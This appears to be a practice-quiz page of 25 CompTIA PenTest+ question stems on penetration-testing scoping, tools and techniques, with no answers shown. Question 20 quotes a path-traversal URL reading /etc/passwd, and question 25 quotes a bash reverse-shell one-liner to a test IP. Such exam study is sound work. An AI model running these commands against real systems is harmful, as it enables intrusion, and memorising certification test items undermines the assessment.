Home > CompTIA PenTest+ Certification > Quizzes > CompTIA Pentest+ PT0-001 Questions
CompTIA Pentest+ PT0-001 Questions
Fast practice, instant feedback. Timer auto-submits when time’s up.
Avg score: 27% Most missed: “Which of the following commands starts the Metasploit database?”
CompTIA PenTest+ certification exam covers all penetration testing stages. The exam includes all aspects of vulnerability management. It not only covers hands-on vulnerability assessment, scanning, and analysis, but also includes planning, scoping, and managing weaknesses, not just exploiting them. PenTest+ covers the latest techniques against expanded attack surfaces. It is a unique exam that requires a candidate to demonstrate the most relevant pen testing skills for the cloud, hybrid environments, web applications, Internet of Things (IoT), and traditional on-premises. The CompTIA... Show more
CompTIA Pentest+ PT0-001 Questions
Time left 00:00
25 Questions

1. During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
2. A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
3. A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?
4. A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would define the target list?
5. A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?
6. A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
7. If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ac0b556ba8 Which of the following formats is the correct hash type?
8. Joe, a penetration tester, is asked to assess a companys physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter the building during business hours or when there are no employees on-site. Which of the following would be the MOST effective in accomplishing this?
9. A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
10. A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
11. Which of the following are MOST important when planning for an engagement?
12. In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
13. A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
14. Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
15. A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?
16. A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment?.
17. A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.6. Which of the following commands will test if the VPN is available?
18. A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
19. During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful. Which of the following would be the BEST target for continued exploitation efforts?
20. Given the following: http://example.com/download.php?id-…/…/…/etc/passwd Which of the following BEST describes the above attack?
21. After performing a security assessment for a firm, the client was found to have been billed for the time the clients test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?
22. A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
23. An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?
24. A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?
25. A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the testers Linux system to make the previous command successful?